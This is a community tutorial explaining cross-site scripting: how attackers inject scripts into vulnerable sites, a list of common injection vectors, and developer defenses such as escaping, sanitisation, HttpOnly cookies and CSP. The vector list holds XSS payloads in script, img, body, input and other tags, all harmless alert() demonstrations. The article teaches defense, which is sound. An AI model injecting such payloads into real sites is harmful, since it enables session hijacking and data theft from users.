Ready to Start Your Career?

XSS Explained - From Theory to Practice

Dr3AMCoDeR 's profile image

By: Dr3AMCoDeR

December 25, 2016

xssHi there Cybrarians!As always, I should thank you to all of you for your support. I'm really happy that my articles are helpful to most of you, and now I'm back with another article. Let's also greet the moderators which are doing a great job with our contents in Cybrary.I was recently asked to explain how XSS attacks work in depth, and that's why I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from such kind of attacks. This article is only for educational purposes and I won't be responsible for any misuse. I won’t answer on anything that is not in the frame "Ethical and Ethical only". 1. What is XSS Attack?- Well, XSS stands for Cross-site Scripting (XSS) Attack (the name contains X because X as a symbol looks like a cross) and this kind of attacks are injected only on the client-side (and we will see how this happens).In other words, this kind of attack refers to a client-side code injection attack where the attacker can execute malicious scripts (commonly called a "payloads") into a legitimate website or web application.In this article, I will assume that you have the background knowledge of how Client-Server architectures work in general so we can easily continue on the XSS. In case you don't remember what am I talking about, let me help you:One General Web Application consists of the following Elements:- The Frontend (The looks of a webpage described with HTML, CSS, Javascript etc) - Browser knows how to understand the code and show it like a visual representation.- The Backend (The logic, the functionalities provided in programming languages like JAVA, C#, PHP etc.)- The Database (The container of the data that is kept for the application). 2.How can attackers make an XSS Attack?In this scenario, we always need 3 objects: A hosted Website, an Attacker, and the Victim.As we said earlier, the Attack (the payload) needs to be injected into a legitimate website. What does that mean? It means that the attacker should need to find a way of using an input field to "inject" the script, and the browser then treats it like a code and executes it.The script from the attacker can then be delivered to the visitors and javascript can then change the visual representation, or redirect the user to another link, or it may also collect a data from your browser(usually attacker wants the cookie) which can result in session hijacking etc.If the Web application is vulnerable to XSS, it will deliver the malicious script to the visitor and then the visitor will be tricked into activating the malicious script. XSS Attacks can be done in VBScript, ActiveX and Flash but they are mostly made in Javascript because Javascript is turned on by default on all browsers. 3. List of most used XSS Vectors
<Script> tag:
<script src=></script><script> alert("Boo!"); </script>
<Body> tag:
<body onload=alert("I'm evil")><body background="javascript:alert("So Evil")">
<Img> tag:
<img src="javascript:alert("Evil");"><img dynsrc="javascript:alert('Bad')"><img lowsrc="javascript:alert('So bad!')">
<Iframe> tag:
<iframe src=””>
<Input> tag:
<input type="image" src="javascript:alert('Evil work');">
<Link> tag:
<link rel="stylesheet" href="javascript:alert('Evil');">
<Table> tag:
<table background="javascript:alert('Evil')"><td background="javascript:alert('So evil')">
<Object> tag:
<object type="text/x-scriptlet" data="">
<Div> tag:
<div style="background-image: url(javascript:alert('Evil'))"> These examples are only a few of the most-known, the idea was to show you how the attacker would inject you. As you might see, if there is a field which is vulnerable, the script injected would be parsed as a code that will run locally and it might be used to trick you into clicking it, it can also collect some data and redirect you to get that data. 4. How to protect from XSS?If you want to protect your application from XSS Attacks, please make sure that you follow the following rules:1.Never Insert Untrusted Data Except in Allowed Locations.2.HTML Escape Before Inserting Untrusted Data into HTML Element Content3.Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes4.JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values5.HTML escape JSON values in an HTML context and read the data with JSON.parse6.URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values7.Sanitize HTML Markup with a Library Designed for the Job8.Prevent DOM-based XSS9.Use HTTPOnly cookie flag10.Use an Auto-Escaping Template System and Implement Content Security Policy Feel free to read on google more about this things. Thank you for reading my article, and feel free to share and support.  
Schedule Demo